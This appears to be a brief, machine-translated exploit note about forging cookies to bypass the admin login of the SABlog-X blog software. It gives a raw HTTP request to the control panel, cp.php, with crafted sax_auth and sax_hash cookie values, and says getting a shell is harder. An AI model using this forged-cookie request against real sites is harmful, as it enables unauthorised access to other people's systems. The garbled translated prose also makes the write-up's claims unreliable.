Vulnerability analysis article:<http://www.80vul.com/sablog/sablog-x-1.txt>
We may not use this POC, then we get SABlog official test! As far as I know SAblog the author is Security angels of the Creator!
First of all open our Guilin veteran developed cookie cheat tool!
GET /cp.php HTTP/1.1; Host: 127.0.0.1 Connection: Close Cookie: sax_auth=MQkJ;sax_hash=abcdef;
There is a section of the cookie, then we point that the lock bit of the input sax_auth=MQkJ;sax_hash=abcdef;
The use is so simple, but get the shell more difficult..